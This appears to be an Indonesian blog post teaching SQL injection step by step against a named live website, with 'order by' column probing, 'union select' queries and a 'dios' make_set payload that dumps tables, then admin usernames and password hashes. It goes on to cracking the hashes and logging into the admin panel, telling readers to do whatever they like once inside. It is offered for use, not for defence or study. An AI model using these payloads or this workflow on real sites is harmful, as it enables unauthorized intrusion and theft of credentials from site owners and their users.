Well Hello People
jumpa lagi.... kali ini gua bakal bahas apa itu SQL Injection
SQL Injection adalah salah satu teknik yang menyalahgunakan celah keamanan yang ada di SQL pada lapisan basis data suatu aplikasi. Celah ini terjadi karena input dari user tidak difilter secara benar dan dalam pembuatannya menggunakan form yang salah.
Nah langsung aja ke caranya :
1. Pilih target yang vuln sql injection.
https://patterndigital.lk/blog-detail.php?id=1 ( Untuk ngecek sitenya vuln apa ngga kalian kasih tanda ' dibelakang id=1 dll )
nah kalo udah lanjutin pake +order+by+1--+ dan naikin terus angkanya sampe muncul unknown columns.
disini site yang gua inject unknown columnsnya ada di angka 8 jadi targetna ada 7 columns. paham kan?
nah lanjutin ke +union+select+1,2,3,4,5,6,7--+ ( Angkanya sesuain sama columnsnya )
nah kalo belom muncul angka magicknya kalian bisa tambahin +and+false+ dibelakang +union+select+, jadi...
nah udah muncul angka yang sering disebut sebagai angka magick / angka ajaib:V
kalo udah kalian masukin dios, disini gua taruh diosnya di angka 2.
Contoh dios
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
nah udah muncul tuh columns ama tables nya. kalo mau dump username password admin tinggal masukin perintah.
make_set(6,@:=0x0a,(select(1)from(tables)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)
untuk bagian USER_NAME,PASSWORD dan tables kalian bisa sesuaikan sama columns dan tables site kalian.
nah hasilnya kaya gitu. kalo udah kalian bisa decrypt password hashnya.
list site buat decrypt password hash md5 dll :
dan masih banyak lagi...
kalo udah ke decrypt kalian bisa kalian tinggal cari login pagenya dan
done masuk. dah sampe dalem serah kelen mo ngapain ya amjinc
oke sekian tips dari gua. jangan lupa di share artikelna oke
paypay
Komentar
Posting Komentar